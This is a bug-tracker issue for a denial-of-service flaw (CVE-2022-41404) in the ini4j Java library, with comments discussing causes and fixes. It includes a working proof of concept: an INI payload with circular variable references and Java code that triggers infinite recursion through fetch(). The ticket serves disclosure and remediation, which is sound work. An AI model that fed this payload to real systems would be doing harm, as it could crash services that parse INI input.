Menu

#56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.

v1.0 (example)
open
Ivan SZKIBA
bug (1)
9
2026-01-27
2022-09-20
bingdian
No

Test logic usable to reproduce the behaviour
payload:
----payload.ini

[dopey]
 weight = ${bashful/weight}
 height = ${doc/height}

[bashful]
 weight = ${dopey/weight}
 height = ${dopey/height}

 [doc]
 weight = 49.5
 height = 87.7

----java poc

        Ini ini = new Ini();
        ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini"))
        );
        ini.get("dopey").fetch("weight");
1 Attachments
1663640415101.jpg

Discussion

  • Salvatore Bonaccorso

    Salvatore Bonaccorso - 2022-10-12

    @szkiba, @bingdian: the description mentions that the issue is present before version 0.5.4. Can you elaborate where the issue was fixed landing in that version?

     

  • Bogdan

    Bogdan - 2022-10-31
    Post awaiting moderation.

  • Marc Lafon

    Marc Lafon - 2022-11-02

    I have taken a quick look to the source code, the problem seem to come from the recursive calls from the BasicProfileSection.fetch and BasicProfile.resolve methods... recursive loop is still present in version 0.54, without any limitation.

     

  • Craig

    Craig - 2023-10-03

    This issue was assigned CVE-2022-41404. (nvd.nist.gov).

    It would be great to resolve this issue - can the project maintainer please accept the requested change and make a release?

     

  • Akisa

    Akisa - 2025-04-11

    Thank you for providing this amazing things.

     

  • Robert Nile

    Robert Nile - 2025-06-29

    You’ve got a circular reference error:

    ini
    Copy
    Edit
    [dopey]
    weight = ${bashful/weight}
    [bashful]
    weight = ${dopey/weight}
    Those two point to each other, causing infinite recursion.

    ✅ Fix:
    Break the cycle by referencing a concrete value, e.g.:

    ini
    Copy
    Edit
    [dopey]
    weight = ${doc/weight}

    [bashful]
    weight = ${doc/weight}
    Or detect and reject circular refs in code.

     

    Last edit: Robert Nile 2025-06-29

  • kliys ideom

    kliys ideom - 2025-10-07

    Good catch — the recursive loop explanation and payload example make this vulnerability very clear. A proper recursion limit or cycle detection is essential to prevent DoS.

     

  • Ivan SZKIBA

    Ivan SZKIBA - 2026-01-27
    • discussion: enabled --> disabled
     

  • Ivan SZKIBA

    Ivan SZKIBA - 2026-01-27

    Hello,

    A fix for this specific vulnerability (CVE-2022-41404) has been prioritized and is scheduled for the upcoming v0.6.0 release.

    The project is currently migrating to GitHub to modernize the build pipeline and deliver this security patch effectively. Please be patient while the infrastructure is finalized to support the new release.

    You can track the migration progress and release status here:
    https://github.com/ini4j/ini4j/issues/1

    The fix will be published to Maven Central as soon as v0.6.0 is ready.

    Best regards,
    ini4j Project

     

  • Ivan SZKIBA

    Ivan SZKIBA - 2026-01-27
    • discussion: disabled --> enabled
     

Log in to post a comment.

MongoDB Logo MongoDB